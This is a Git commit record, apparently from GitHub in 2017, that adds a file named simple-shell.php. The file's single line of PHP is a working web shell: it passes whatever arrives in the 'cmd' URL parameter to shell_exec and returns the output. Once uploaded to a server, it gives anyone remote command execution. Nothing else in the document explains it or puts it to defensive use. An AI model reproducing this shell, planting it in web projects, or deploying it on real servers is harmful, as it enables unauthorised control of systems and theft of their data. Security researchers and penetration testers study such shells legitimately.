Create simple-shell.php

This commit is contained in:
z0noxz
2017-01-14 13:44:36 +01:00
committed by GitHub
parent 51504a0467
commit 06fcce84e5

1
simple-shell.php Normal file
View File

@@ -0,0 +1 @@
<?php if (isset($_GET["cmd"])) { echo shell_exec($_GET["cmd"]); die; } ?>